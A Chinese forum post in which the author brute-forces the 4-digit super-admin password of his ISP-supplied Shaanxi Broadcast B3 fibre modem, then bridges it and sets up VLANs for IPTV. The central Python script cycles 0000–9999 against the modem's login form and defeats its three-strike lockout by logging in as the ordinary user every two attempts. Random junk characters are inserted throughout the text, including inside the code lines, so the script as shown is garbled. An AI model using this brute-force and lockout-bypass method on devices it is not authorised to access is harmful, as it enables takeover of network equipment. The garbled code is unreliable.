|
坐标 029 ,最近拉了条陕西广电的 IPTV ,随线路还有一条 300M 宽带,想着可以做做联通 1000M 线路的冗余备份,顺便能折腾下陕西广电的组播源,毕竟广电的频道数量和码率吊打陕西联通。陕西联通 IPTV 就是个渣渣,频道少码率差不说,还不是单独组播线路,直播点播统统占我带宽。 然而广电小哥拉完线路调测完并不肯告诉我光猫超级密码,这必须不能忍。网上找了一圈发现古早 B1 、B2 版本的方法在 B3 光猫跟前统统不能用,但受到之前方法的启发,发现光猫上报配置之后依然会将 useradmin 的超级密码更改为随机 4 位数字的弱密码,那就很容易穷举出来。所以思路和 B2 版本一致,但 B2 判断登陆成功与否的方式在 B3 版本上已不适用。 通过抓包发现 B3 版本的光猫在登陆成功后会有个 302 重定向,并且尝试 3 次登陆失败后会有一个 180 秒的锁定时间,但在 3 次尝试中只要有一次正常的登陆就可以重置这个计数器。 所以总结一下思路: - 抓包分析登陆动作实现逻辑及 URL
- useradmin 的密码从 0000 开始尝试至 9999 ,通过判断是否有 302 响应确定登陆成功与否
- 为防止 3 次登陆锁定,需要每尝试 2 次之后成功登陆一下 user 普通用户重置计数器# v" J: E; D3 c
根据以上思路随便写了段 python ,以下代码: - import requests# w$ C) R1 n, C6 X
- from bs4 import BeautifulSoup; F- k v6 L; S1 k, h9 r6 ^
- import re
& X0 t* @4 E3 D F& m1 o - , Y7 s" G! c3 o$ T1 B- B
- for i in range(10000):
. [' z. U/ e2 i" B% m6 C - User_Agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36"
6 ^. O0 c2 j; n. i! X4 F - 1 c8 ^+ j+ ~( F
- headers = {"User-Agent": User_Agent}
2 B7 C; c4 t: a" n4 B2 e - session = requests.Session(). W: f2 M( n1 ^9 J
- 8 k1 r f: C" l7 s% Z u/ H
- response = session.get("http://192.168.1.1")' O1 \8 |. v- L2 V2 [2 V4 T) B
- cookies = session.cookies, L5 z9 _$ k! y0 r# G8 G
- - _1 B1 {% S& O
- login_url = "http://192.168.1.1/boaform/admin/formLogin"
/ Z) \5 m) m4 z/ B - if (i % 2 == 1 or i == 0):8 t( W0 t n d# Q- Y3 p; Y
- # 防止密码错误次数到达上限,*替换成自己光猫的 user 密码' p0 U8 Y* _* q
- login_data = {"username": "user", "psd": "********", "login_in": "%B5%C7%C2%BC"}
m8 b( m: e. e4 F( Q6 o! n - session.post(login_url, login_data, allow_redirects=False)$ I+ U: R m7 m# m' M0 b
- logout_url = "http://192.168.1.1/boaform/admin/formLogout"! w- m9 c8 t* [3 @8 y
- session.post(logout_url, allow_redirects=False)+ F% j# l/ X4 t3 L8 t3 C6 ]
- # 尝试以 useradmin 及 4 位数字密码登陆
# v: r. O0 i8 m: \$ W# G - login_data = {"username": "useradmin", "psd": "{:04d}".format(i), "login_in": "%B5%C7%C2%BC"}- i2 a: V# K! ~, b+ h3 q
- res = session.post(login_url, login_data, allow_redirects=False)6 w: R/ Q; T6 Z+ \# v+ l
- v4 P& s9 H6 G7 M0 M7 v
- # 检查是否有 302 重定向& {/ T* h* w* j1 ~, E
- if res.status_code == 302:
% b+ F1 w1 r3 x n j* w! u8 X# B* H - print("Login succeeded with password:", "{:04d}".format(i))8 s2 J: f. d4 B6 a; u8 f J
- break- N9 M; u6 P' q: h7 A P, k
- else:9 ~& _# ~$ l2 t" g
- print("Login failed for password:", "{:04d}".format(i))
懒得优化了,能跑就行
4 i" E' S0 S4 M1 _
0 z6 L3 G3 r9 Y3 U) s7 I
然而我这个随机密码居然是 9 开头 4 位数,以至于我一度认为脚本有问题。。。。
; ]: t* E9 [- g- m( _( f) ?, T尝试登陆一下
) K/ O0 R# z Y% \) e6 Q+ s5 E
这下看起来舒服多了,随手翻翻 WAN 线路配置, Q% f/ A9 f1 k" d9 T* g v
, r2 ?8 @( f; B
vlan44 宽带,vlan45 iptv ,顺手想改个桥接,正苦于哪找 pppoe 签权信息,发现广电这个大善人居然就在页面上写着: f' Z4 ?# y$ l2 b9 S) |9 ?
; t/ d3 v! Q n
那就不客气了,必须桥接走起
. ~+ _! m& m* Y4 g- C ! s; _' {& |2 @% {
9 [/ e9 P+ g& c! R ]- P8 b/ R0 a
光猫里找了一圈并没找到 vlan mapping 的配置,总不能再拉根线到电视柜啊?% q; t( g4 i9 H
那就进后台翻翻看配置藏哪了
" z, S4 c5 o: K 1 a6 w% I( F, f/ t8 n
还真给翻到了7 d2 o0 V& X2 K z. f9 R( @: Y
6 H% n. f( q6 ]. ^2 D" X
那不客气了,vlan 号懒得改就随手用它的,反正屋里多这俩也不冲突。
6 X. y. l& X3 x; w2 |广电盒子划 vlan45 里,接电视一切正常。
/ ?: u* G+ Q4 c- u' V4 ?+ A5 l300M 宽带聊胜于无,写个冗余留给 wireguard ,ros 里新起个 vrf ,AC 里绑个无线没密码限速 8M 给隔壁小孩谋谋福利。
5 ?- \8 {5 J- X5 k iptv 组播源改天再折腾吧
* H) c# F' a! k1 KPS.iptv vlan45 要有 dhcp option60 才能拿到地址。陕西广电 option60 居然是'600831STB',呵呵。。% ?% f7 K( w+ E# r4 s: u b* u% v
" B4 b7 j7 y+ ]3 C* Z4 {: G% K
以上,有陕西广电的兄弟可以参考一下。) J5 d6 s" K0 O" `. \# t
# T* D9 a1 z( w! e | 
粤公网安备44152102000001号 
发表于 2024-5-21 02:06:52
发表于 2024-5-21 23:20:59